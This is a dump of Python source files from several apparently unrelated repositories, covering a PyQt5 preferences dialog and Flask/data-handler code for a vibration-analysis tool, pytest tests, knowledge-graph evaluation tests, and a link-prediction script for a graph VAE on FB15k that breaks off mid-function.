self.recordersPane.addWidget(self.addRecorderButton, 1, 2, 1, 1)
self.panes.addLayout(self.recordersPane)
self.systemPane = QtWidgets.QGridLayout()
self.systemPane.setObjectName("systemPane")
self.checkForUpdates = QtWidgets.QCheckBox(preferencesDialog)
self.checkForUpdates.setChecked(True)
self.checkForUpdates.setObjectName("checkForUpdates")
self.systemPane.addWidget(self.checkForUpdates, 1, 0, 1, 1)
self.checkForBetaUpdates = QtWidgets.QCheckBox(preferencesDialog)
self.checkForBetaUpdates.setObjectName("checkForBetaUpdates")
self.systemPane.addWidget(self.checkForBetaUpdates, 1, 1, 1, 1)
self.systemLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.systemLayoutLabel.setFont(font)
self.systemLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.systemLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.systemLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.systemLayoutLabel.setObjectName("systemLayoutLabel")
self.systemPane.addWidget(self.systemLayoutLabel, 0, 0, 1, 2)
self.panes.addLayout(self.systemPane)
self.verticalLayout.addLayout(self.panes)
self.buttonBox = QtWidgets.QDialogButtonBox(preferencesDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.RestoreDefaults|QtWidgets.QDialogButtonBox.Save)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(preferencesDialog)
self.buttonBox.accepted.connect(preferencesDialog.accept)
self.buttonBox.rejected.connect(preferencesDialog.reject)
self.wavSaveDirPicker.clicked.connect(preferencesDialog.pick_save_dir)
self.recorderIP.textChanged['QString'].connect(preferencesDialog.validate_ip)
self.addRecorderButton.clicked.connect(preferencesDialog.add_recorder)
self.deleteRecorderButton.clicked.connect(preferencesDialog.delete_recorder)
self.clearTarget.clicked.connect(preferencesDialog.clear_target)
self.loadTarget.clicked.connect(preferencesDialog.load_target)
QtCore.QMetaObject.connectSlotsByName(preferencesDialog)
preferencesDialog.setTabOrder(self.wavSaveDir, self.wavSaveDirPicker)
preferencesDialog.setTabOrder(self.wavSaveDirPicker, self.xScale)
preferencesDialog.setTabOrder(self.xScale, self.yScale)
preferencesDialog.setTabOrder(self.yScale, self.zScale)
preferencesDialog.setTabOrder(self.zScale, self.magMin)
preferencesDialog.setTabOrder(self.magMin, self.magMax)
preferencesDialog.setTabOrder(self.magMax, self.freqMin)
preferencesDialog.setTabOrder(self.freqMin, self.freqMax)
preferencesDialog.setTabOrder(self.freqMax, self.recorderIP)
preferencesDialog.setTabOrder(self.recorderIP, self.addRecorderButton)
preferencesDialog.setTabOrder(self.addRecorderButton, self.recorders)
preferencesDialog.setTabOrder(self.recorders, self.deleteRecorderButton)
preferencesDialog.setTabOrder(self.deleteRecorderButton, self.checkForUpdates)
preferencesDialog.setTabOrder(self.checkForUpdates, self.checkForBetaUpdates)
def retranslateUi(self, preferencesDialog):
_translate = QtCore.QCoreApplication.translate
preferencesDialog.setWindowTitle(_translate("preferencesDialog", "Preferences"))
self.wavSaveDirLabel.setText(_translate("preferencesDialog", "Save Directory"))
self.wavSaveDirPicker.setText(_translate("preferencesDialog", "..."))
self.userLayoutLabel.setText(_translate("preferencesDialog", "Export"))
self.rtaLabel.setText(_translate("preferencesDialog", "RTA"))
self.displayLayoutLabel.setText(_translate("preferencesDialog", "Display"))
self.targetLabel.setText(_translate("preferencesDialog", "Target"))
self.spectroScaleFactor.setItemText(0, _translate("preferencesDialog", "1x"))
self.spectroScaleFactor.setItemText(1, _translate("preferencesDialog", "2x"))
self.spectroScaleFactor.setItemText(2, _translate("preferencesDialog", "4x"))
self.spectroScaleFactor.setItemText(3, _translate("preferencesDialog", "8x"))
self.spectroScaleFactor.setItemText(4, _translate("preferencesDialog", "16x"))
self.spectroScaleFactor.setItemText(5, _translate("preferencesDialog", "32x"))
self.spectroScaleLabel.setText(_translate("preferencesDialog", "Spectrogram"))
self.spectroScaleAlgoLabel.setText(_translate("preferencesDialog", "Algorithm"))
self.spectroScaleFactorLabel.setText(_translate("preferencesDialog", "Scale Factor"))
self.loadTarget.setText(_translate("preferencesDialog", "..."))
self.clearTarget.setText(_translate("preferencesDialog", "..."))
self.createTarget.setText(_translate("preferencesDialog", "..."))
self.targetSet.setText(_translate("preferencesDialog", "Set?"))
self.spectroScaleAlgo.setItemText(0, _translate("preferencesDialog", "Nearest"))
self.spectroScaleAlgo.setItemText(1, _translate("preferencesDialog", "Bilinear"))
self.spectroScaleAlgo.setItemText(2, _translate("preferencesDialog", "Hamming"))
self.spectroScaleAlgo.setItemText(3, _translate("preferencesDialog", "Bicubic"))
self.spectroScaleAlgo.setItemText(4, _translate("preferencesDialog", "Lanczos"))
self.zScaleLabel.setText(_translate("preferencesDialog", "z Scale"))
self.xScale.setSuffix(_translate("preferencesDialog", " x"))
self.magMin.setSuffix(_translate("preferencesDialog", " dB"))
self.xScaleLabel.setText(_translate("preferencesDialog", "x Scale"))
self.analysisLayoutLabel.setText(_translate("preferencesDialog", "Analysis"))
self.magMaxLabel.setText(_translate("preferencesDialog", "Max"))
self.yScale.setSuffix(_translate("preferencesDialog", " x"))
self.zScale.setSuffix(_translate("preferencesDialog", " x"))
self.yScaleLabel.setText(_translate("preferencesDialog", "y Scale"))
self.maxMinLabel.setText(_translate("preferencesDialog", "Magnitude Min"))
self.magMax.setSuffix(_translate("preferencesDialog", " dB"))
self.freqMinLabel.setText(_translate("preferencesDialog", "Frequency Min"))
self.freqMaxLabel.setText(_translate("preferencesDialog", "Max"))
self.freqMin.setSuffix(_translate("preferencesDialog", " Hz"))
self.freqMax.setSuffix(_translate("preferencesDialog", " Hz"))
self.detrendLabel.setText(_translate("preferencesDialog", "Detrend"))
self.detrend.setItemText(0, _translate("preferencesDialog", "None"))
self.detrend.setItemText(1, _translate("preferencesDialog", "Constant"))
self.detrend.setItemText(2, _translate("preferencesDialog", "Linear"))
self.highpassRTA.setText(_translate("preferencesDialog", "High pass RTA?"))
self.recorderIP.setInputMask(_translate("preferencesDialog", "000.000.000.000:00000"))
self.deleteRecorderButton.setText(_translate("preferencesDialog", "..."))
self.ipAddressLabel.setText(_translate("preferencesDialog", "Address"))
self.analysisLayoutLabel1.setText(_translate("preferencesDialog", "Recorders"))
self.addRecorderButton.setText(_translate("preferencesDialog", "..."))
self.checkForUpdates.setText(_translate("preferencesDialog", "Check for Updates on startup?"))
self.checkForBetaUpdates.setText(_translate("preferencesDialog", "Include Beta Versions?"))
self.systemLayoutLabel.setText(_translate("preferencesDialog", "System"))
```
#### File: python/ui/target.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_targetCurveDialog(object):
def setupUi(self, targetCurveDialog):
targetCurveDialog.setObjectName("targetCurveDialog")
targetCurveDialog.resize(754, 517)
self.gridLayout = QtWidgets.QGridLayout(targetCurveDialog)
self.gridLayout.setObjectName("gridLayout")
self.preview = PlotWidgetForSpectrum(targetCurveDialog)
self.preview.setObjectName("preview")
self.gridLayout.addWidget(self.preview, 3, 0, 1, 7)
self.magnitude = QtWidgets.QDoubleSpinBox(targetCurveDialog)
self.magnitude.setDecimals(1)
self.magnitude.setMinimum(-120.0)
self.magnitude.setMaximum(0.0)
self.magnitude.setSingleStep(0.1)
self.magnitude.setObjectName("magnitude")
self.gridLayout.addWidget(self.magnitude, 0, 3, 1, 1)
self.frequencyLabel = QtWidgets.QLabel(targetCurveDialog)
self.frequencyLabel.setObjectName("frequencyLabel")
self.gridLayout.addWidget(self.frequencyLabel, 0, 0, 1, 1)
self.magnitudeLabel = QtWidgets.QLabel(targetCurveDialog)
self.magnitudeLabel.setObjectName("magnitudeLabel")
self.gridLayout.addWidget(self.magnitudeLabel, 0, 2, 1, 1)
self.deleteHingeButton = QtWidgets.QToolButton(targetCurveDialog)
self.deleteHingeButton.setObjectName("deleteHingeButton")
self.gridLayout.addWidget(self.deleteHingeButton, 1, 4, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(targetCurveDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Close|QtWidgets.QDialogButtonBox.Save)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 4, 6, 1, 1)
self.frequency = QtWidgets.QDoubleSpinBox(targetCurveDialog)
self.frequency.setDecimals(0)
self.frequency.setMaximum(24000.0)
self.frequency.setObjectName("frequency")
self.gridLayout.addWidget(self.frequency, 0, 1, 1, 1)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 0, 6, 1, 1)
self.hinges = QtWidgets.QComboBox(targetCurveDialog)
self.hinges.setObjectName("hinges")
self.gridLayout.addWidget(self.hinges, 1, 1, 1, 3)
self.label = QtWidgets.QLabel(targetCurveDialog)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 0, 1, 1)
self.addHingeButton = QtWidgets.QToolButton(targetCurveDialog)
self.addHingeButton.setObjectName("addHingeButton")
self.gridLayout.addWidget(self.addHingeButton, 0, 4, 1, 1)
self.loadIsoTarget = QtWidgets.QPushButton(targetCurveDialog)
self.loadIsoTarget.setObjectName("loadIsoTarget")
self.gridLayout.addWidget(self.loadIsoTarget, 1, 5, 1, 1)
self.retranslateUi(targetCurveDialog)
self.buttonBox.accepted.connect(targetCurveDialog.accept)
self.buttonBox.rejected.connect(targetCurveDialog.reject)
QtCore.QMetaObject.connectSlotsByName(targetCurveDialog)
def retranslateUi(self, targetCurveDialog):
_translate = QtCore.QCoreApplication.translate
targetCurveDialog.setWindowTitle(_translate("targetCurveDialog", "Create Target Curve"))
self.frequencyLabel.setText(_translate("targetCurveDialog", "Frequency"))
self.magnitudeLabel.setText(_translate("targetCurveDialog", "Magnitude"))
self.deleteHingeButton.setText(_translate("targetCurveDialog", "..."))
self.label.setText(_translate("targetCurveDialog", "Hinge Points"))
self.addHingeButton.setText(_translate("targetCurveDialog", "..."))
self.loadIsoTarget.setText(_translate("targetCurveDialog", "Load IsoPerception"))
from qvibe import PlotWidgetForSpectrum
``` |
{
"source": "3ll3d00d/vibe",
"score": 3
} |
#### File: analyser/resources/target.py
```python
import logging
from flask import request
from flask_restful import Resource
logger = logging.getLogger('analyser.target')
class Target(Resource):
def __init__(self, **kwargs):
self._targetController = kwargs['targetController']
def get(self, targetId):
"""
Yields the analysed wav data.
:param targetId:
:return:
"""
result = self._targetController.analyse(targetId)
if result:
if len(result) == 2:
if isinstance(result[1], int) and result[1] == 404:  # guard: comparing a numpy array to 404 is ambiguous
return result
else:
return {'name': targetId, 'data': self._jsonify(result)}, 200
else:
return None, 404
else:
return None, 500
def put(self, targetId):
"""
stores a new target.
:param targetId: the target to store.
:return:
"""
json = request.get_json()
if 'hinge' in json:
logger.info('Storing target ' + targetId)
if self._targetController.storeFromHinge(targetId, json['hinge']):
logger.info('Stored target ' + targetId)
return None, 200
else:
return None, 500
else:
return None, 400
def delete(self, targetId):
"""
deletes the specified target.
:param targetId:
:return:
"""
if self._targetController.delete(targetId):
return None, 200
else:
return None, 500
def _jsonify(self, tup):
return {'freq': tup[0].tolist(), 'val': tup[1].tolist()}
```
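For context, a hypothetical client session against the Target resource above could look like this; the host, port, URL prefix and the hinge payload shape (frequency/magnitude pairs) are all assumptions, not taken from the repo:
```python
import requests

# Illustrative only: base URL and hinge structure are assumed.
base = 'http://localhost:5000/target'
requests.put(base + '/mycurve', json={'hinge': [[20, -6.0], [80, 0.0]]})  # store a curve
requests.get(base + '/mycurve')     # analyse it
requests.delete(base + '/mycurve')  # remove it
```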
#### File: src/core/handler.py
```python
import abc
import csv
import datetime
import logging
import os
import threading
from queue import Queue, Empty
from flask import json
from core.httpclient import RequestsBasedHttpClient
from core.interface import DATETIME_FORMAT, API_PREFIX
class DataHandler:
"""
A simple interface to define the expected behaviour of something that handles data.
"""
@abc.abstractmethod
def start(self, measurementId):
"""
Initialises a handling session.
:param measurementId: the name of the measurement that is about to start.
:return:
"""
pass
@abc.abstractmethod
def handle(self, data):
"""
A callback for handling some raw data.
:param data a list of dicts containing the sample data
:return:
"""
pass
@abc.abstractmethod
def stop(self, measurementId, failureReason=None):
"""
Allows for cleanup on end of measurement.
:param measurementId the measurement that is stopping.
:param failureReason the reason it failed if any, if None then it completed ok.
:return:
"""
pass
class Discarder(DataHandler):
"""
a data handler that simply throws the data away
"""
def start(self, measurementId):
pass
def handle(self, data):
pass
def stop(self, measurementId, failureReason=None):
pass
class CSVLogger(DataHandler):
"""
A handler which logs the received data to CSV into target/measurementId/loggerName/data.out
"""
def __init__(self, owner, name, target):
self.logger = logging.getLogger(owner + '.csvlogger')
self.name = name
self.target = target
self.started = False
self._csv = None
self._csvfile = None
self._first = True
def start(self, measurementId):
targetDir = os.path.join(self.target, measurementId, self.name)
if not os.path.exists(targetDir):
os.makedirs(targetDir, exist_ok=True)
targetPath = os.path.join(targetDir, 'data.out')
if os.path.exists(targetPath):
mode = 'w'
else:
mode = 'x'
self._csvfile = open(targetPath, mode=mode, newline='')
self._csv = csv.writer(self._csvfile)
self.started = True
self._first = True
def handle(self, data):
"""
Writes each sample to a csv file.
:param data: the samples.
:return:
"""
self.logger.debug("Handling " + str(len(data)) + " data items")
for datum in data:
if isinstance(datum, dict):
# these have to be wrapped in a list for python 3.4 due to a change in the implementation
# of OrderedDict in python 3.5+ (which means .keys() and .values() are sequences in 3.5+)
if self._first:
self._csv.writerow(list(datum.keys()))
self._first = False
self._csv.writerow(list(datum.values()))
elif isinstance(datum, list):
self._csv.writerow(datum)
else:
self.logger.warning("Ignoring unsupported data type " + str(type(datum)) + " : " + str(datum))
def stop(self, measurementId, failureReason=None):
if self._csvfile is not None:
self.logger.debug("Closing csvfile for " + measurementId)
self._csvfile.close()
class AsyncHandler(DataHandler):
"""
A handler which hands the data off to another thread.
"""
def __init__(self, owner, delegate):
self.logger = logging.getLogger(owner + '.asynchandler')
self.name = "Async"
self.delegate = delegate
self.queue = Queue()
self.worker = None
self.working = False
self.stopping = False
def start(self, measurementId):
self.delegate.start(measurementId)
self.worker = threading.Thread(target=self.asyncHandle, daemon=True)
self.working = True
self.logger.info('Starting async handler for ' + measurementId)
self.worker.start()
def handle(self, data):
self.queue.put(data)
def stop(self, measurementId, failureReason=None):
# TODO do we need to link this stop to the status of the accelerometer
self.logger.info('Stopping async handler for ' + measurementId)
self.stopping = True
self.queue.join()
self.delegate.stop(measurementId, failureReason=failureReason)
self.logger.info('Stopped async handler for ' + measurementId)
self.working = False
def asyncHandle(self):
remaining = -1
while self.working:
try:
event = self.queue.get(timeout=1)
if event is not None:
self.delegate.handle(event)
self.queue.task_done()
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug('async queue has ' + str(self.queue.qsize()) + ' items')
elif self.stopping:
if remaining == -1:
remaining = self.queue.qsize()
self.logger.info('Closing down asynchandler, ' + str(remaining) + ' items remaining')
remaining -= 1
except Empty:
pass
class HttpPoster(DataHandler):
"""
A handler which sends the data over http.
"""
def __init__(self, name, target, httpclient=RequestsBasedHttpClient()):
self.name = name
self.logger = logging.getLogger(name + '.httpposter')
self.httpclient = httpclient
self.target = target[:-1] if target.endswith('/') else target
self.deviceName = None
self.rootURL = self.target + API_PREFIX + '/measurements/'
self.sendURL = None
self.startResponseCode = None
self.dataResponseCode = []
self.endResponseCode = None
def start(self, measurementId):
"""
Posts to the target to tell it a named measurement is starting.
:param measurementId:
"""
self.sendURL = self.rootURL + measurementId + '/' + self.deviceName
self.startResponseCode = self._doPut(self.sendURL)
def _doPut(self, url, data=None):
formattedPayload = None if data is None else json.dumps(data, sort_keys=True)
try:
return self.httpclient.put(url, json=formattedPayload).status_code
except Exception as e:
self.logger.exception(e)
return 500
def handle(self, data):
"""
puts the data in the target.
:param data: the data to post.
:return:
"""
self.dataResponseCode.append(self._doPut(self.sendURL + '/data', data=data))
def stop(self, measurementId, failureReason=None):
"""
informs the target the named measurement has completed
:param measurementId: the measurement that has completed.
:return:
"""
if failureReason is None:
self.endResponseCode = self._doPut(self.sendURL + "/complete")
else:
self.endResponseCode = self._doPut(self.sendURL + "/failed", data={'failureReason': failureReason})
self.sendURL = None
# TODO verify that the response codes are all ok
```
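The handlers above are designed to compose. A minimal sketch, assuming the `core.handler` module layout shown and a writable target directory (paths and the sample payload are made up):
```python
from core.handler import AsyncHandler, CSVLogger

logger = CSVLogger('demo', 'accel', '/tmp/measurements')
handler = AsyncHandler('demo', logger)
handler.start('run1')                             # opens /tmp/measurements/run1/accel/data.out
handler.handle([{'x': 0.1, 'y': 0.0, 'z': 9.8}])  # queued, written on the worker thread
handler.stop('run1')                              # drains the queue, then closes the file
```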
#### File: recorder/common/i2c_io.py
```python
import abc
from queue import Queue
from .mpu6050 import mpu6050
class i2c_io(object):
"""
A thin wrapper on the smbus for reading and writing data. Exists to allow unit testing without a real device
connected.
"""
def __init__(self):
pass
"""
Writes data to the device.
:param: i2cAddress: the address to write to.
:param: register: the location to write to.
:param: val: the value to write.
"""
@abc.abstractmethod
def write(self, i2cAddress, register, val):
pass
"""
Reads data from the device.
:param: i2cAddress: the address to read from.
:param: register: the register to read from.
:return: the data read.
"""
@abc.abstractmethod
def read(self, i2cAddress, register):
pass
"""
Reads a block of data from the device.
:param: i2cAddress: the address to read from.
:param: register: the register to read from.
:param: length: no of bytes to read.
:return: the data read.
"""
@abc.abstractmethod
def readBlock(self, i2cAddress, register, length):
pass
class mock_io(i2c_io):
def __init__(self, dataProvider=None):
super().__init__()
self.valuesWritten = []
self.dataProvider = dataProvider
self.valsToRead = Queue()
def write(self, i2cAddress, register, val):
self.valuesWritten.append([i2cAddress, register, val])
def readBlock(self, i2cAddress, register, length):
if self.dataProvider is not None:
ret = self.dataProvider(register, length)
if ret is not None:
return ret
return self.valsToRead.get_nowait()
def read(self, i2cAddress, register):
if self.dataProvider is not None:
ret = self.dataProvider(register)
if ret is not None:
return ret
return self.valsToRead.get_nowait()
class MockIoDataProvider:
@abc.abstractmethod
def provide(self, register):
pass
class WhiteNoiseProvider(MockIoDataProvider):
"""
A mock io provider which yields white noise.
"""
def __init__(self):
import numpy as np
self.samples = {
'x': np.random.normal(0, 0.25, size=1000),
'y': np.random.normal(0, 0.25, size=1000),
'z': np.random.normal(0, 0.25, size=1000)
}
self.idx = 0
def provide(self, register, length=None):
if register is mpu6050.MPU6050_RA_INT_STATUS:
return 0x01
elif register is mpu6050.MPU6050_RA_FIFO_COUNTH:
return [0b0000, 0b1100]
elif register is mpu6050.MPU6050_RA_FIFO_R_W:
bytes = bytearray()
self.addValue(bytes, 'x')
self.addValue(bytes, 'y')
self.addValue(bytes, 'z')
self.idx += 1
self.addValue(bytes, 'x')
self.addValue(bytes, 'y')
self.addValue(bytes, 'z')
return bytes
else:
if length is None:
return 0b00000000
else:
return [x.to_bytes(1, 'big') for x in range(length)]
def addValue(self, bytes, key):
val = abs(int((self.samples[key][self.idx % 1000] * 32768)))
try:
b = bytearray(val.to_bytes(2, 'big'))
except OverflowError:
print("Value too big - " + str(val) + " - replacing with 0")
val = 0
b = bytearray(val.to_bytes(2, 'big'))
bytes.extend(b)
```
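A short sketch of driving the mock io with the white-noise provider; the import paths assume the package layout implied by the relative `.mpu6050` import above:
```python
from recorder.common.i2c_io import mock_io, WhiteNoiseProvider
from recorder.common.mpu6050 import mpu6050

io = mock_io(dataProvider=WhiteNoiseProvider().provide)
status = io.read(0x68, mpu6050.MPU6050_RA_INT_STATUS)       # -> 0x01 (data ready)
fifo = io.readBlock(0x68, mpu6050.MPU6050_RA_FIFO_R_W, 12)  # two fake x/y/z samples
```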
#### File: analyser/common/test_devicecontroller.py
```python
import datetime
from time import sleep
from unittest.mock import MagicMock, Mock
import pytest
from analyser.common.devicecontroller import DeviceController
from core.httpclient import RecordingHttpClient
from core.interface import RecordingDeviceStatus, DATETIME_FORMAT
DEVICE_MAX_AGE_SECONDS = 1
@pytest.fixture
def httpclient():
return RecordingHttpClient()
@pytest.fixture
def targetStateController():
mm = MagicMock()
mm.update = Mock()
return mm
@pytest.fixture
def deviceController(tmpdirPath, targetStateController, httpclient):
controller = DeviceController(targetStateController, tmpdirPath, httpclient, maxAgeSeconds=DEVICE_MAX_AGE_SECONDS)
yield controller
controller.shutdown()
def test_whenNewDeviceArrives_ItIsStoredInTheCache_AndTargetStateIsReached(deviceController, targetStateController):
assert len(deviceController.getDevices()) == 0
device = {}
deviceId = 'hello'
deviceController.accept(deviceId, device)
assert len(deviceController.getDevices()) == 1
assert deviceId in [i.deviceId for i in deviceController.getDevices()]
storedDevice = deviceController.getDevice(deviceId)
assert storedDevice is not None
assert storedDevice.deviceId == deviceId
assert storedDevice.dataHandler is not None
assert storedDevice.lastUpdateTime is not None
assert storedDevice.payload is not None
assert storedDevice.payload is device
assert datetime.datetime.utcnow() >= storedDevice.lastUpdateTime
# FIXFIX I appear to have no clue how to use python's mock; this appears to pass but blows up inside the
# equals function
# assert targetStateController.update.assert_called_once_with(device)
def test_whenDeviceIsHeardFrom_ItIsKeptAlive_AndEvicted_IfItGoesSilent(deviceController, targetStateController):
test_whenNewDeviceArrives_ItIsStoredInTheCache_AndTargetStateIsReached(deviceController, targetStateController)
sleep(DEVICE_MAX_AGE_SECONDS / 2)
assert len(deviceController.getDevices()) == 1
assert 'hello' in [i.deviceId for i in deviceController.getDevices()]
deviceController.accept('hello', {})
assert len(deviceController.getDevices()) == 1
assert 'hello' in [i.deviceId for i in deviceController.getDevices()]
sleep(DEVICE_MAX_AGE_SECONDS + 0.2)
assert len(deviceController.getDevices()) == 1
def test_canGetDevicesByStatus(deviceController):
oldDevice = {'status': 'OLD'}
deviceController.accept('old', oldDevice)
newDevice = {'status': 'NEW'}
deviceController.accept('new', newDevice)
assert len(deviceController.getDevices()) == 2
oldDevices = deviceController.getDevices('OLD')
assert len(oldDevices) == 1
assert oldDevices[0] is not None
assert oldDevices[0].deviceId is not None
assert oldDevices[0].deviceId == 'old'
newDevices = deviceController.getDevices('NEW')
assert len(newDevices) == 1
assert newDevices[0] is not None
assert newDevices[0].deviceId is not None
assert newDevices[0].deviceId == 'new'
def test_measurementsAreNotScheduledForUninitialisedDevices(deviceController):
device = {'status': 'OLD'}
deviceController.accept('old', device)
devices = deviceController.getDevices('OLD')
assert len(devices) == 1
assert devices[0] is not None
assert devices[0].deviceId is not None
assert devices[0].deviceId == 'old'
assert len(deviceController.scheduleMeasurement('next', 10, datetime.datetime.utcnow())) == 0
def test_measurementsAreScheduledForInitialisedDevices(deviceController, httpclient):
device = {'status': RecordingDeviceStatus.INITIALISED.name, 'serviceURL': 'hello'}
deviceController.accept('old', device)
devices = deviceController.getDevices(RecordingDeviceStatus.INITIALISED.name)
assert len(devices) == 1
assert devices[0] is not None
assert devices[0].deviceId is not None
assert devices[0].deviceId == 'old'
startTime = datetime.datetime.utcnow()
measurement = deviceController.scheduleMeasurement('next', 10, startTime)
assert len(measurement) == 1 # there is a response
assert len(httpclient.record) == 1 # measurement was sent to the device
args = httpclient.record[0]
assert len(args) == 3
# we sent a put to serviceURL/measurements/measurementId with a json payload
assert args[0] == 'put'
assert args[1] == 'hello/measurements/next'
assert type(args[2]) is dict
assert 'json' in args[2]
assert 'duration' in args[2]['json']
assert args[2]['json']['duration'] == 10
assert 'at' in args[2]['json']
assert args[2]['json']['at'] == startTime.strftime(DATETIME_FORMAT)
``` |
{
"source": "3lLobo/embed",
"score": 3
} |
#### File: embed/tests/utiltests.py
```python
import _context
from kgmodels.util import eval
import unittest
import torch
from torch import nn
import sys
class TestUtil(unittest.TestCase):
def test_eval(self):
N = 500
class Scorer(nn.Module):
def __init__(self):
super().__init__()
def forward(self, triples):
scores = triples[:, 0] if triples[0, 2] == triples[1, 2] else triples[:, 2]
return scores.to(torch.float).pow(-1.0)
model = Scorer()
testset = [(i, 0, i) for i in range(N)]
testset = torch.tensor(testset, dtype=torch.long)
mrr, hits, ranks = eval(model=model, valset=testset, alltriples=[], n=N, verbose=False)
self.assertEqual(ranks, list(range(1, N+1)) * 2)
self.assertEqual(mrr, sum([1/r for r in ranks])/len(ranks))
self.assertEqual(hits[0], 2/(N * 2)) # one correct ans for head corrupt, one for tail
self.assertEqual(hits[1], 6/(N * 2))
self.assertEqual(hits[2], 20/(N * 2))
``` |
{
"source": "3lLobo/ReinforcementLearningAndPlanning",
"score": 3
} |
#### File: ReinforcementLearningAndPlanning/Assignment1/main.py
```python
import numpy as np
import pandas as pd
import seaborn as sns
''' Parameter setting '''
steps = 1000
demand = 1
sell_price = 20
purch_price = 10
order_limit = 900
M = steps # Assuming the max of one demand per time step
runs = 10
seed = 6 # Set random seed for reproducibility
def main():
''' The grid will store the values for all possible states. '''
value_grid = np.zeros((steps, M))
profit_grid = np.zeros((steps, M))
order_grid = np.zeros((steps, M))
demand_list = np.zeros(steps)
for run in range(runs):
''' Loop over all timesteps and x values. '''
# Set individual seed for every run
np.random.seed( seed+run )
print('Start simulation! Run %d' % run)
for t in range(steps-1, 0, -1):
for x in range(M):
demand_prob = (t+1)/steps
demand_t = np.random.choice([demand, 0], 1, p=[demand_prob, 1-demand_prob])
demand_list[t] = demand_t
# Define constraints on the purchase price; check the t > 900 case first,
# otherwise it is shadowed by the t > 500 branch
if t > 900:
k = 100000
elif t > 500:
k = purch_price + 5
else:
k = purch_price
# Define the possible order volume
if demand > x:
n_order = np.linspace(demand_t-x, M-x+demand_t, M, dtype=int, endpoint=False)
else:
n_order = np.linspace(0, M-x+demand_t, M-x+demand_t, dtype=int, endpoint=False)
# Consider the exception for the final state
if t == steps - 1:
p = demand_t * sell_price - x * purch_price
p_order = 0
else:
p = demand_t * sell_price - n_order * k + profit_grid[t+1, x-demand_t+n_order]
max_idx = np.argmax(p)
p = p[max_idx]
p_order = n_order[max_idx]
# Fill in the grid with the results
profit_grid[t,x] = p
order_grid[t,x] = p_order
demand_list[t] = demand_t
''' Save data as csv files. '''
print('Saving ...')
df2 = pd.DataFrame()
df_order = pd.DataFrame()
df_demand = pd.DataFrame()
df_demand['Demand'] = demand_list
for n in range(steps):
df2['inventory' + str(n)] = profit_grid[:,n]
df_order['inventory' + str(n)] = order_grid[:,n]
df2.to_csv('Pgrid_%d.csv' % run)
df_order.to_csv('Ogrid_%d.csv' % run)
df_demand.to_csv("demand_time%d.csv" % run)
print('Done!')
if __name__ == "__main__":
main()
``` |
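The backward recursion filled into `profit_grid` corresponds to the Bellman equation below (notation follows the script: x is the inventory, n the order volume, k_t the step-dependent purchase price and d_t the sampled demand); a sketch of the intended recursion rather than a verbatim transcription:
```latex
V_t(x) = \max_{n \ge \max(d_t - x,\, 0)}
\left[ d_t\, p_{\mathrm{sell}} - n\, k_t + V_{t+1}(x - d_t + n) \right]
```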
{
"source": "3lLobo/rgvae",
"score": 3
} |
#### File: data/fb15k/mk_df.py
```python
import pandas as pd
import pickle as pkl
def pkl_df(file_path, path2save):
# Load the entity dictionary
e2t = dict()
with open(file_path, 'r+') as f:
for line in f.readlines():
pair = line.split('\t', 1)
value = pair[1].replace('\n', '')
e2t[pair[0]] = value
# entity2text = pd.read_csv(file_path, header=None, sep='\t')
# entity2text.columns = ['a', 'b']
# entity_dict = entity2text.set_index('Entity').T.to_dict('series')
# del entity2text
with open(path2save+'.pkl', 'wb') as f:
pkl.dump(e2t, f)
print('Dataframe converted to dictionary and saved here: {}'.format(path2save))
if __name__ == "__main__":
path = 'data/fb15k/'
txt_file = 'entity2type.txt'
pkl_file = 'e2type_dict'
pkl_df(path+txt_file, path+pkl_file)
```
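Reloading the pickled dictionary mirrors the save path used in the `__main__` block above:
```python
import pickle as pkl

with open('data/fb15k/e2type_dict.pkl', 'rb') as f:
    e2t = pkl.load(f)
print(len(e2t), 'entities mapped to types')
```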
#### File: rgvae/experiments/link_prediction.py
```python
import time
import os
from torch_rgvae.GVAE import GVAE
from torch_rgvae.GCVAE import GCVAE
from torch_rgvae.train_fn import train_sparse_batch
from utils.lp_utils import *
import tqdm
import json
from datetime import date
def link_prediction(model, testsub, truedict, batch_size):
"""
Performs link prediction with the given model on the given dataset's test set.
Saves results as json in the /data folder.
:param model: torch VAE model
:param testsub: tensor containing the test-set triples
:param truedict: collection of true triples per head+rel/tail+rel set
:param batch_size: batch size
"""
n_e = model.n_e
n_r = model.n_r
with torch.no_grad():
model.train(False)
mrr, hits, ranks = eval(
model=model, valset=testsub, truedicts=truedict, n=n_e, r=n_r,
batch_size=batch_size, verbose=True, elbo=True)
print(f'MRR {mrr:.4}\t hits@1 {hits[0]:.4}\t hits@3 {hits[1]:.4}\t hits@10 {hits[2]:.4}')
lp_results = {'mrr': mrr, 'h@1': hits[0], 'h@3': hits[1], 'h@10': hits[2]}
return lp_results
if __name__ == "__main__":
# This sets the default torch dtype to double precision.
my_dtype = torch.float64
torch.set_default_dtype(my_dtype)
# Parameters. Arg parsing on its way.
n = 1 # number of triples per matrix ( = matrix_n/2)
batch_size = 16 # Choose a low batch size for debugging, or creating the dataset will take very long.
seed = 11
np.random.seed(seed=seed)
torch.manual_seed(seed)
dataset = 'fb15k'
model_path = 'data/model/GCVAE_fb15k_11e_20201025.pt'
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
# Get data
(n2i, i2n), (r2i, i2r), train_set, test_set, all_triples = load_link_prediction_data(dataset)
n_e = len(n2i)
n_r = len(r2i)
testsub = torch.tensor(test_set)
truedict = truedicts(all_triples)
# Initialize model.
